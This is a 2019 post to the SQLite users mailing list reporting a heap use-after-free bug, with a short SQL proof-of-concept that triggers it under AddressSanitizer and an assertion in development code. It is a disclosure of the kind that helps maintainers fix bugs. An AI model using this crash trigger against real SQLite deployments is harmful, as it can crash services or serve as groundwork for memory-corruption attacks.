[sqlite] Heap Use After Free In sqlite.

Fri, 27 Dec 2019 10:59:18 -0800 

Hi, 

We found a heap UAF bug in sqlite. Here’s the PoC:

—
CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ; CREATE 
TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0 
WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ; INSERT INTO v0 SELECT * FROM v0 
WHERE v1 OR 0 ; CREATE VIEW v2 ( v3 ) AS WITH x1 AS ( SELECT * FROM v2 ) SELECT 
v3 AS x , v3 AS y FROM v2 ; ALTER TABLE zipfile RENAME TO t3 ;
—

This bug exists in both release code and development code. It triggers uaf with 
asan with release code while triggering an assert in the delevelopment code.

Yongheng & Rui
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Reply via email to